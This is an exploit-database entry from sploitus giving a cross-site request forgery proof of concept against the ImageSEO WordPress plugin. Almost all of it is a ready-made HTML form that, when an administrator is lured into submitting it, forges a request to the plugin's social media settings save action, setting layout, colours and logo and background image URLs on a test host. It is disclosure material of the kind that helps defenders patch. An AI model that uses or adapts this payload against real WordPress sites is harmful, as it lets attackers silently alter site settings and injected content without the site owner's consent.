Share
## https://sploitus.com/exploit?id=WPEX-ID:0FF435BC-EA20-4993-98AE-1F61B1732B59
Use the following form to abuse the CSRF vulnerability on the settings page:

<html><form enctype="application/x-www-form-urlencoded" method="POST" action="https://vulnerable.imageseo.ddev.site/"><table><tr><td>action</td><td><input type="text" value="imageseo_social_media_settings_save" name="action"></td></tr>
<tr><td>layout</td><td><input type="text" value="CARD_LEFT" name="layout"></td></tr>
<tr><td>textColor</td><td><input type="text" value="#000000" name="textColor"></td></tr>
<tr><td>contentBackgroundColor</td><td><input type="text" value="#ffffff" name="contentBackgroundColor"></td></tr>
<tr><td>starColor</td><td><input type="text" value="#F8CA00" name="starColor"></td></tr>
<tr><td>visibilitySubTitle</td><td><input type="text" value="true" name="visibilitySubTitle"></td></tr>
<tr><td>visibilitySubTitleTwo</td><td><input type="text" value="true" name="visibilitySubTitleTwo"></td></tr>
<tr><td>visibilityAvatar</td><td><input type="text" value="true" name="visibilityAvatar"></td></tr>
<tr><td>visibilityRating</td><td><input type="text" value="false" name="visibilityRating"></td></tr>
<tr><td>defaultBgImg</td><td><input type="text" value="http://7957.imageseo.ddev.site/wp-content/plugins/imageseo/dist/images/default_logo.png" name="defaultBgImg"></td></tr>
<tr><td>textAlignment</td><td><input type="text" value="top" name="textAlignment"></td></tr>
<tr><td>logoUrl</td><td><input type="text" value="http://7957.imageseo.ddev.site/wp-content/plugins/imageseo/dist/images/favicon.png" name="logoUrl"></td></tr>
</table><input type="submit" value="https://vulnerable.imageseo.ddev.site/"></form></html>